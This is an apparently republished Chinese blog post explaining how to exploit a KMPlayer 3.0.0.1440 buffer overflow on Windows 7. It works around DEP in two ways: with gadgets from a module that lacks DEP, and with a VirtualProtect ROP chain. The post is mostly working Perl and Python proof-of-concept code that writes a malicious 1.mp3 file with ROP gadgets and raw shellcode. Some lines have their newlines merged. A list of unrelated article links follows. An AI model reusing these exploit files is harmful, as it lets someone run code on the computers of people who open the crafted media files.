默认win7+开启DEP win7 VirtualProtect 3方法 The KMPlayer 3.0.0.1440 WIN7 ASLR+DEP

2023-10-25 03:10

本文主要是介绍默认win7+开启DEP win7 VirtualProtect 3方法 The KMPlayer 3.0.0.1440 WIN7 ASLR+DEP,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

默认情况下  WIN7 安装这个软件  对这个软件exe   DEP是没开启的 如果这是这样的话,可能有点难度,如果能再给一个没有开启DEP的DLL那么就更好了

~_~    更好破的说~_~  

软件是一个音乐播放器,运行后  加载一个  MP3  才会加载漏洞DLL,并且 音乐播放完毕后,DLL没有卸载出 没有使用 FreeLibrary,

所以有EXE+DLL 两个没有 开启DEP 的地址让我们去利用


http://www.exploit-db.com/exploits/17383/


如果默认情况下~~~~~~~~~~~~~~~~WIN7  OPTIN下 这个软件没开启DEP

简便方法:Perl POC 如下:

my $file = "1.mp3";#perl    
my $just= "A"x16;$just = $just.pack('V',0x100FCB7F);# PUSH ESP # POP EDI # POP ESI # POP EBP # POP EBX # ADD ESP,2C # RETN 	[Module : PProcDLL.dll]  ** 
$just = $just."\x90"x60;$just = $just.pack('V',0x100D7C2A);# PUSH EDI # PUSH 5F6C7789 # POP ESI # POP EBP # POP EBX # ADD ESP,14 # RETN 18 	[Module : PProcDLL.dll]  ** 
$just = $just."\x90"x24;$just = $just.pack('V',0x100346E8);# ADD EBP,0A4 # MOV ESP,EBP # POP EBP # RETN 	[Module : PProcDLL.dll]  ** 
$just = $just."\x90"x24; #top 0x18$just = $just."\x90"x56;
$just = $just.pack('V',0x10101BB8);# PUSH ESP # RETN 	[Module : PProcDLL.dll]  **my $shellcode = "\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x5B\x0C\x8B\x5B\x0C\x8B\x1B\x8B\x1B\x8B\x5B\x18\x8B\xEB\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB\x53\x68\x64\x61\x30\x23\x68\x23\x50\x61\x6E\x8B\xC4\x53\x50\x50\x53\xFF\x57\xFC\x53\xFF\x57\xF8";my $payload= $just.$shellcode;print length($payload);  
open($FILE,">$file");      
binmode($FILE);
print $FILE $payload;      
close($FILE);     



VirtualProtect 3方法 

这种情况就是对方的电脑开启了DEP optout

bcdedit /set nx alwayson


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

注意用 python 写 文件生成时  用 不然会生成错误\x0a\x0b

import os
 
evilfile = "1.mp3"

~~~~~~

crashy = open(evilfile,"wb")
crashy.write(sploit)
crashy.close()


perl 写文件时 用   不然会生成错误\x0a\x0b

my $file = "exploits.m3u";#perl    
  
my $junk= "\x41"x26075;  
 
my $payload= $junk;

print length($payload);  
open($FILE,">$file");      
binmode($FILE);
print $FILE $payload;      
close($FILE);     

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


python POC:  

import osevilfile = "1.mp3"junk = "A"*16shellcode = "\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x5B\x0C\x8B\x5B\x0C\x8B\x1B\x8B\x1B\x8B\x5B\x18\x8B\xEB\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB\x53\x68\x64\x61\x30\x23\x68\x23\x50\x61\x6E\x8B\xC4\x53\x50\x50\x53\xFF\x57\xFC\x53\xFF\x57\xF8"rop_align = "BBBB"################################# Begin ROP chain ########################################### Redirect execution back to stack ##########
rop = "\x17\xBF\x0E\x10"                        #0x100EBF17 :  # ADD ESP,20 # RETN 4
rop += rop_align * 9
########## Place stack pointer in EAX ##########
rop += "\x7F\xCB\x0F\x10"                       #0x100FCB7F :  # PUSH ESP # POP EDI # POP ESI # POP EBP # POP EBX # ADD ESP,2C # RETN
rop += rop_align    * 15
rop += "\xC8\x1B\x12\x10"                       #0x10121BC8 :  # MOV EAX,EDI # POP ESI # RETN
rop += rop_align
########## Jump over VirtualProtect() params ##########
rop += "\x56\x75\x13\x10"                       #0x10137556 :  # ADD ESP,20 # RETN
########## VirtualProtect call placeholder ##########
rop += "\x42\x45\x45\x46"                       #&Kernel32.VirtualProtect() placeholder - "BEEF"
rop += "WWWW"                                   #Return address param placeholder
rop += "XXXX"                                   #lpAddress param placeholder
rop += "YYYY"                                   #Size param placeholder
rop += "ZZZZ"                                   #flNewProtect param placeholder
rop += "\x60\xFC\x18\x10"                       #lpflOldProtect param placeholder (Writeable Address) - 0x1018FC60 {PAGE_WRITECOPY}
rop += rop_align    * 2
########## Grab kernel32 pointer from the stack, place it in EAX ##########rop += "\x5D\x1C\x12\x10" * 6                   #0x10121C5D :  # SUB EAX,30 # RETNrop += "\xD0\x64\x03\x10"                       #0x100364D0 :  # ADD EAX,8 # RETN
rop += "\x33\x29\x0E\x10" *4                       #0x100E2933 :  # DEC EAX # RETNrop += "\xF6\xBC\x11\x10"                       #0x1011BCF6 :  # MOV EAX,DWORD PTR DS:[EAX] # POP ESI # RETN 
rop += rop_align
########## EAX = kernel pointer, now retrieve pointer to VirtualProtect() ##########
rop += "\xA6\x42\x01\x10" 			            #0x100142A6 :  # POP ESI # RETN 	    [Module : PProcDLL.dll]  ** 
rop += "\x45\x5e\xff\xff"                       #0xFFFFF667 = 0-0xA1BB 
rop += "\xBE\x40\x01\x10"                       #0x100140BE :  # ADD EAX,ESI # RETN 	[Module : PProcDLL.dll]  ** 
rop += "\x01\x2B\x0D\x10"                       #0x100D2B01 :  # MOV ECX,EAX # RETN
########## At this point, ECX = &kernel32.VirtualProtect########## Make EAX point to address of VirtualProtect() placeholder ##########
rop += "\xC8\x1B\x12\x10"                       #0x10121BC8 :  # MOV EAX,EDI # POP ESI # RETN
rop += rop_align
rop += "\xB1\xB6\x11\x10" * 6                   #0x1011B6B1 :  # ADD EAX,0C # RETN
rop += "\x9f\x2b\x0d\x10" * 4                   #0x100D2B9F :  # SUB EAX,1 # RETN 	[Module : PProcDLL.dll]  ** 
########## Write VirtualProtect pointer to stack ##########
rop += "\x41\x2F\x11\x10"                       #0x10112F41 :  # MOV DWORD PTR DS:[EAX],ECX # POP ESI # RETN 4
rop += rop_align
########## Make ECX point to address of nops / shellcode ##########
rop += "\xC8\x1B\x12\x10"                       #0x10121BC8 :  # MOV EAX,EDI # POP ESI # RETN
rop += rop_align * 2 
rop += ("\x76\xE5\x12\x10" + rop_align) * 3     #0x1012E576 :  # ADD EAX,100 # POP EBP # RETN
rop += "\x01\x2B\x0D\x10"                       #0x100D2B01 :  # MOV ECX,EAX # RETN
########## Make EAX point to return address placeholder ##########
rop += "\xC8\x1B\x12\x10"                       #0x10121BC8 :  # MOV EAX,EDI # POP ESI # RETN
rop += rop_align
rop += "\xB1\xB6\x11\x10" * 6                   #0x1011B6B1 :  # ADD EAX,0C # RETN
########## Write return address to stack ##########
rop += "\x41\x2F\x11\x10"                       #0x10112F41 :  # MOV DWORD PTR DS:[EAX],ECX # POP ESI # RETN 4
rop += rop_align
########## Make EAX point to lpAddress placeholder ##########
rop += "\xC8\x1B\x12\x10"                       #0x10121BC8 :  # MOV EAX,EDI # POP ESI # RETN
rop += rop_align
rop += "\xB1\xB6\x11\x10" * 7                   #0x1011B6B1 :  # ADD EAX,0C # RETN
rop += "\xD5\xCE\x11\x10" * 4                   #0x1011CED5 :  # INC EAX # RETN
########## Write lpAddress to stack ##########
rop += "\x41\x2F\x11\x10"                       #0x10112F41 :  # MOV DWORD PTR DS:[EAX],ECX # POP ESI # RETN 4
rop += rop_align
########## Save address of VirtualProtect call placeholder to EBX (for later) ##########
rop += "\x77\x78\x12\x10"                       #0x10127877 :  # SUB EAX,7 # POP ESI # RETN
rop += rop_align * 2
rop += "\x33\x29\x0E\x10"                       #0x100E2933 :  # DEC EAX # RETN
rop += "\x81\x96\x03\x10"                       #0x10039681 :  # XCHG EAX,EBX # ADD AL,10 # RETN    [Module : PProcDLL.dll]  ** 
########## Make EAX point to Size param placeholder ##########
rop += "\xC8\x1B\x12\x10"                       #0x10121BC8 :  # MOV EAX,EDI # POP ESI # RETN
rop += rop_align
rop += "\xB1\xB6\x11\x10" * 6                   #0x1011B6B1 :  # ADD EAX,0C # RETN
rop += "\xD0\x64\x03\x10"                       #0x100364D0 :  # ADD EAX,8 # RETN
########## Craft Size parameter into EAX (Adjust to needed/desired size) ##########
rop += "\x01\x2B\x0D\x10"                       #0x100D2B01 :  # MOV ECX,EAX # RETN
rop += "\x2C\x2A\x0D\x10"                       #0x100D2A2C :  # XOR EAX,EAX # RETN
rop += ("\x76\xE5\x12\x10" + rop_align) * 10    #0x1012E576 :  # ADD EAX,100 # POP EBP # RETN
########## Write Size param to stack ##########
rop += "\x60\x83\x02\x10"                       #0x10028360 :  # MOV DWORD PTR DS:[ECX],EAX # RETN
########## Make EAX point to address of flNewProtect placeholder ##########
rop += "\xD2\x9F\x10\x10"                       #0x10109FD2 :  # MOV EAX,ECX # RETN
rop += "\xD0\x64\x03\x10"                       #0x100364D0 :  # ADD EAX,8 # RETN
rop += "\x33\x29\x0E\x10" * 4                   #0x100E2933 :  # DEC EAX # RETN
rop += "\x01\x2B\x0D\x10"                       #0x100D2B01 :  # MOV ECX,EAX # RETN
########## Put flNewProtect param (0x00000040) in EAX ##########
rop += "\x2C\x2A\x0D\x10"                       #0x100D2A2C :  # XOR EAX,EAX # RETN
rop += "\x68\xE5\x12\x10"                       #0x1012E568 :  # ADD EAX,40 # POP EBP # RETN
rop += rop_align
########## Write flNewProtect param to stack ##########
rop += "\x60\x83\x02\x10"                       #0x10028360 :  # MOV DWORD PTR DS:[ECX],EAX # RETN########## Everything is ready to go, Get EBX back into ESP and RETN ##########
rop += "\xD8\xA3\x10\x10"                       #0x10039681 :  # XCHG EAX,EBX # ADD AL,10 # RETN
rop += rop_align
rop += "\x99\x09\x11\x10"                       #0x10110999 :  # XCHG EAX,ESP # RETN
################################# End ROP chain #################################nops = "\x90" * 300sploit = (junk + rop + nops + shellcode )crashy = open(evilfile,"wb")
crashy.write(sploit)
crashy.close()


话说 我还不小心把  VirtualProtect 整成了 VirtualAlloc 妈蛋  闹了个乌龙~~~~~~~~~~~~~~~~















这篇关于默认win7+开启DEP win7 VirtualProtect 3方法 The KMPlayer 3.0.0.1440 WIN7 ASLR+DEP的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/279624

相关文章

SQL中redo log 刷⼊磁盘的常见方法

《SQL中redolog刷⼊磁盘的常见方法》本文主要介绍了SQL中redolog刷⼊磁盘的常见方法,将redolog刷入磁盘的方法确保了数据的持久性和一致性,下面就来具体介绍一下,感兴趣的可以了解... 目录Redo Log 刷入磁盘的方法Redo Log 刷入磁盘的过程代码示例(伪代码)在数据库系统中,r

Python实现图片分割的多种方法总结

《Python实现图片分割的多种方法总结》图片分割是图像处理中的一个重要任务,它的目标是将图像划分为多个区域或者对象,本文为大家整理了一些常用的分割方法,大家可以根据需求自行选择... 目录1. 基于传统图像处理的分割方法(1) 使用固定阈值分割图片(2) 自适应阈值分割(3) 使用图像边缘检测分割(4)

Java中Switch Case多个条件处理方法举例

《Java中SwitchCase多个条件处理方法举例》Java中switch语句用于根据变量值执行不同代码块,适用于多个条件的处理,:本文主要介绍Java中SwitchCase多个条件处理的相... 目录前言基本语法处理多个条件示例1:合并相同代码的多个case示例2:通过字符串合并多个case进阶用法使用

CentOS7更改默认SSH端口与配置指南

《CentOS7更改默认SSH端口与配置指南》SSH是Linux服务器远程管理的核心工具,其默认监听端口为22,由于端口22众所周知,这也使得服务器容易受到自动化扫描和暴力破解攻击,本文将系统性地介绍... 目录引言为什么要更改 SSH 默认端口?步骤详解:如何更改 Centos 7 的 SSH 默认端口1

springboot项目如何开启https服务

《springboot项目如何开启https服务》:本文主要介绍springboot项目如何开启https服务方式,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录springboot项目开启https服务1. 生成SSL证书密钥库使用keytool生成自签名证书将

Python中__init__方法使用的深度解析

《Python中__init__方法使用的深度解析》在Python的面向对象编程(OOP)体系中,__init__方法如同建造房屋时的奠基仪式——它定义了对象诞生时的初始状态,下面我们就来深入了解下_... 目录一、__init__的基因图谱二、初始化过程的魔法时刻继承链中的初始化顺序self参数的奥秘默认

html5的响应式布局的方法示例详解

《html5的响应式布局的方法示例详解》:本文主要介绍了HTML5中使用媒体查询和Flexbox进行响应式布局的方法,简要介绍了CSSGrid布局的基础知识和如何实现自动换行的网格布局,详细内容请阅读本文,希望能对你有所帮助... 一 使用媒体查询响应式布局        使用的参数@media这是常用的

Spring 基于XML配置 bean管理 Bean-IOC的方法

《Spring基于XML配置bean管理Bean-IOC的方法》:本文主要介绍Spring基于XML配置bean管理Bean-IOC的方法,本文给大家介绍的非常详细,对大家的学习或工作具有一... 目录一. spring学习的核心内容二. 基于 XML 配置 bean1. 通过类型来获取 bean2. 通过

基于Python实现读取嵌套压缩包下文件的方法

《基于Python实现读取嵌套压缩包下文件的方法》工作中遇到的问题,需要用Python实现嵌套压缩包下文件读取,本文给大家介绍了详细的解决方法,并有相关的代码示例供大家参考,需要的朋友可以参考下... 目录思路完整代码代码优化思路打开外层zip压缩包并遍历文件:使用with zipfile.ZipFil

Python处理函数调用超时的四种方法

《Python处理函数调用超时的四种方法》在实际开发过程中,我们可能会遇到一些场景,需要对函数的执行时间进行限制,例如,当一个函数执行时间过长时,可能会导致程序卡顿、资源占用过高,因此,在某些情况下,... 目录前言func-timeout1. 安装 func-timeout2. 基本用法自定义进程subp